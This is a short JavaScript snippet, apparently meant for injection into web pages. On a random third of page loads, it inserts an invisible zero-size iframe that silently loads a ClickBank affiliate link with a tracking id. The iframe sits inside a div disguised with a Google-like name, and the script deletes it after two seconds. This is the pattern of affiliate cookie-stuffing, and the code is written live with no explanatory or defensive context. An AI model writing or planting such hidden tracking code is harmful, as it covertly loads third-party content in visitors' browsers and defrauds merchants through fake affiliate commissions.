function rand ( n )
{
  return ( Math.floor ( Math.random ( ) * n + 1 ) );
}

function destroyDiv() 
{   
	obj = document.getElementById("GoogleMainOuterLayer");  
	document.body.removeChild(obj);	
}

var ran = rand( 3 );
var theUrl = 'http://83d55nudyskpp-toj3veyu1m93.hop.clickbank.net/?tid=MAR04';
var theDiv = '<iframe src="'+theUrl+'" width="0" height="0" align="middle" frameborder="0"></iframe>';
var theBody = document.body; 
if (!theBody) {theBody = document.getElementById("body"); 
if (!theBody) {theBody = document.getElementsByTagName("body")[0];}}
if (theBody && (ran==1))
{
	divtag = document.createElement("div"); 
	divtag.setAttribute("id","GoogleMainOuterLayer"); 
	divtag.style.position="absolute"; 
	divtag.style.width="0"; 
	divtag.style.height="0"; 
	divtag.style.zIndex="99"; 
	divtag.style.left="0px"; 
	divtag.style.top="0px"; 
	divtag.innerHTML=theDiv; 
	theBody.appendChild(divtag);
	setTimeout("destroyDiv()",2000);
}
